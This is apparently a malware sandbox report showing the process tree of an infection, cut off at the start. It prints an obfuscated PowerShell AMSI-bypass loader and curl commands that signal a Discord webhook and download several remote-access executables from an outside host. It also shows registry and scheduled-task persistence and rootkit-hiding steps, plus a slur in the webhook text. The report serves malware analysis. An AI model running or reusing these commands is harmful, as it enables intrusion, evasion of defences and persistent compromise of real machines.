Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+','+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+'t,V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'',$TIDcXxbMPT,$vnzInwxdNVlxkR).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+'ti'+'m'+''+'e'+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $NXjPmyfoVuP.CreateType();}$EVoIFXBgssuVk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+'tem'+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+'r'+'os'+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+''+'a'+'f'+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$TmAwZYPapITkyG=$EVoIFXBgssuVk.GetMethod(''+[Char](71)+'etP'+[Char](114)+'oc'+'A'+'ddr'+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c,Sta'+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KzWRmzRpVOmLQlJvsKc=nOgvgZQkzbuj @([String])([IntPtr]);$LUGoOothUppRrKkYBhYlRR=nOgvgZQkzbuj @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$NtRTrhKPTZo=$EVoIFXBgssuVk.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+'a'+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+'n'+''+'e'+''+'l'+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$hwYuowfmghXRom=$TmAwZYPapITkyG.Invoke($Null,@([Object]$NtRTrhKPTZo,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$qxljhDmIdJFNkpiDr=$TmAwZYPapITkyG.Invoke($Null,@([Object]$NtRTrhKPTZo,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'P'+[Char](114)+'o'+'t'+''+'e'+'c'+'t'+'')));$LDgGrYP=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hwYuowfmghXRom,$KzWRmzRpVOmLQlJvsKc).Invoke(''+'a'+'ms'+'i'+'.'+[Char](100)+''+[Char](108)+'l');$tnRKkWGugYLpMcilx=$TmAwZYPapITkyG.Invoke($Null,@([Object]$LDgGrYP,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+[Char](83)+''+'c'+'a'+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+'f'+[Char](101)+''+'r'+'')));$BaLQpIPOrR=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qxljhDmIdJFNkpiDr,$LUGoOothUppRrKkYBhYlRR).Invoke($tnRKkWGugYLpMcilx,[uint32]8,4,[ref]$BaLQpIPOrR);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$tnRKkWGugYLpMcilx,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qxljhDmIdJFNkpiDr,$LUGoOothUppRrKkYBhYlRR).Invoke($tnRKkWGugYLpMcilx,[uint32]8,0x20,[ref]$BaLQpIPOrR);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+[Char](87)+''+'A'+''+'R'+''+'E'+'').GetValue('$'+'7'+''+[Char](55)+'s'+[Char](116)+''+'a'+'ge'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
-
C:\Users\Admin\AppData\Roaming\$77-penisware.exeC:\Users\Admin\AppData\Roaming\$77-penisware.exe2⤵
-
C:\Users\Admin\AppData\Roaming\$77-scchost.exeC:\Users\Admin\AppData\Roaming\$77-scchost.exe2⤵
-
C:\Users\Admin\AppData\Roaming\$77-penisware.exeC:\Users\Admin\AppData\Roaming\$77-penisware.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dropper_1.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650013⤵
-
C:\Windows\system32\curl.exeC:\Windows\system32\curl "https://discord.com/api/webhooks/1250147812503584798/kM-golxLeBjZkcQMdjxFBJ8cEzMjI9zUI-ekNo5GaP0xIAPrgIM71FdqGQFE9zwSksRt" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone"",""embeds"":[{""title"":""Loader Was Ran By Admin!"",""color"":16711680,""author"":{""name"":""Sexy Niggas""},""footer"":{""text"":""UD Loader - Mon 06/17/2024 21:31:49.45""}}],""username"":""UD Loader"",""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"3⤵
-
C:\Windows\system32\curl.exeC:\Windows\system32\curl "https://penisware.com/r77/Install.exe" --output "C:\Windows\Resources\$77-install.exe"3⤵
- Drops file in Windows directory
-
C:\Windows\system32\curl.exeC:\Windows\system32\curl https://penisware.com/xworm/sdchost.exe --output C:\Windows\Resources\$77-sdchost.exe3⤵
- Drops file in Windows directory
-
C:\Windows\system32\curl.exeC:\Windows\system32\curl https://penisware.com/venom/scchost.exe --output C:\Windows\Resources\$77-scchost.exe3⤵
- Drops file in Windows directory
-
C:\Windows\system32\curl.exeC:\Windows\system32\curl https://penisware.com/xworm/penisware-gold.exe --output C:\Windows\Resources\$77-penisware.exe3⤵
- Drops file in Windows directory
-
C:\Windows\system32\curl.exeC:\Windows\system32\curl https://penisware.com/venom/penisware2.exe --output C:\Windows\Resources\$77-penisware2.exe3⤵
- Drops file in Windows directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y "3⤵
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-sdchost.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y "3⤵
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-sdchost.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y "3⤵
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-sdchost.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y "3⤵
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-scchost.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y "3⤵
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-scchost.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y "3⤵
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-scchost.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y "3⤵
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-penisware.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y "3⤵
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-penisware.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y "3⤵
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-penisware.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y "3⤵
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-penisware2.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y "3⤵
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-penisware2.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y "3⤵
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-penisware2.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y "3⤵
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-install.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y "3⤵
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-install.exe3⤵
-
C:\Windows\Resources\$77-sdchost.exe"C:\Windows\Resources\$77-sdchost.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\Resources\$77-scchost.exe"C:\Windows\Resources\$77-scchost.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-sachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-sachost.exe"' & exit4⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77-sachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-sachost.exe"'5⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1C3D.tmp.bat""4⤵
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\$77-sachost.exe"C:\Users\Admin\AppData\Roaming\$77-sachost.exe"5⤵
- Executes dropped EXE
-
C:\Windows\Resources\$77-penisware.exe"C:\Windows\Resources\$77-penisware.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-penisware" /tr "C:\Users\Admin\AppData\Roaming\$77-penisware.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\Resources\$77-penisware2.exe"C:\Windows\Resources\$77-penisware2.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
-
C:\Windows\Resources\$77-install.exe"C:\Windows\Resources\$77-install.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x23c,0x240,0x244,0x238,0x214,0x7ff825262e98,0x7ff825262ea4,0x7ff825262eb02⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2800 --field-trial-handle=2744,i,16362475727591565961,3676688664819797550,262144 --variations-seed-version /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4272 --field-trial-handle=2744,i,16362475727591565961,3676688664819797550,262144 --variations-seed-version /prefetch:82⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 53d7028c9998346eea8dc053f743257f POQLc0mj1k60avLBwT7KDw.0.1.0.0.01⤵
- Sets service image path in registry
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506Filesize
328B
MD5f268d21a0ebda81c092b4016cc6c280e
SHA11c27f4b073c7f1ef88ab4b9d78e68d4cec2dc8db
SHA256be63affb950352271c96c46a4c53c2330e1ff41de26d6c0bb8a3e9b704bab985
SHA5125d1f238d1437a85e3ec7278c28ab6e19cae745de48a968486b0546fa5fbf70d7ed01bb5471dc7cb5bc54d99733da2792b89a5b826ce22742ec00d6fbb748033c
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-penisware.exe.logFilesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-scchost.exe.logFilesize
1KB
MD5183dd1cd0014293865e135951d0197ab
SHA1268bba2c9c82727b1b32857e67ec26af46ad4cc6
SHA2562f46685bdaf0f2e29ea07f3967a99785e9eab1add962f357acfc68b53545057e
SHA512c6fb59e54c4934bd4018ac404a7cd4d5ab6f1687b8e73c9a54d16f0158381f0d8c41160cd8f7f11ecff0da84f3b278beb5a224c7423a8623be617cf7ec63b271
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent StateFilesize
1KB
MD544d5c30ae434a9def33ba92cd13b9679
SHA1f0f98afb1e42f4131652701414d676cc5d4354a0
SHA256ef0f2157b65b64e4c41489fddc3624c09f4fc877545433812b9722bed32f6d64
SHA512624512d6800e6a74934f972acbe3b618b9069d17386cd59a0b526bc8cecc4f03f37978dc917e0ca4176769ecde7c8ce01e259413d1c5f4573db426493dab32bc
-
C:\Users\Admin\AppData\Local\Temp\tmp1C3D.tmp.batFilesize
155B
MD5cfa0151b53a03931df3eba6deebe064d
SHA154af70bcbf50c5021f934481502bc583b4976c18
SHA2565331587eb0bdefe7ec6cbc94f57dffa014c387bb3193d1b14d5f0ee3b4c56cc7
SHA5125aba8d1233f576d94c6a618717d9695137bf1905004e724d3e99e79f00edc55e32d1739abfd3e688ce7f7b2111af029e751836b651e1948048fb13c19779f214
-
C:\Windows\Resources\$77-install.exeFilesize
163KB
MD51a7d1b5d24ba30c4d3d5502295ab5e89
SHA12d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
-
C:\Windows\Resources\$77-penisware.exeFilesize
443KB
MD5d2b0fd7476f280dc1d8d085d693b37f8
SHA16d8cd2158d77f33b7c320984cedbbf3ac7c8513c
SHA256c05c71085a3ff83980a530aa77c500b98610f4e934315b6831448b96a45d9067
SHA512d3fd2bfe426b9c9a1c83e3b03fd0f6c32e07c236116f4319305adbe8e323be506cc92a390e7d86e0355618df995474455c26f8de24831283902e90c38853bf41
-
C:\Windows\Resources\$77-penisware2.exeFilesize
256KB
MD518f497deffe88b6b2cff336a277aface
SHA14e1413241d3d3e4dbff399d179f8fd64f3ecd39e
SHA2568133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
SHA51235c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d
-
C:\Windows\Resources\$77-scchost.exeFilesize
545KB
MD59c17bdda52e21d8df835cee315b506dd
SHA1f01ccf02c4b92dc8e261da1e48f54ccd548c8af0
SHA256f8bcd12f0b30a378747069cc28aaae74d30aafc33656152ee34f818a10e8973f
SHA5127acd79e169949ef7445230ea474a38786cda317469be340fa94b83dcf26b0025b0baff45ff37c88c632ceaef6565a503d7f19d3884c467f8d68c28f86c3f9889
-
C:\Windows\Resources\$77-sdchost.exeFilesize
508KB
MD53f7291a1225138608a020a1e3ccc4740
SHA177bc47fd739a3efb3f22b590b6acb4e101d78c61
SHA256b07657bb984766acf4f99a7645f6da9a251e2dc3afc839a6ae7f049605b87011
SHA51203c622b528930e70d103a7ccfe8405cea333e5801a8bded99555bb58819b67ee5dcdb0861a3bc17afd5903b392f0a7a766047dbccd1674203c61238cd65f39e7
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
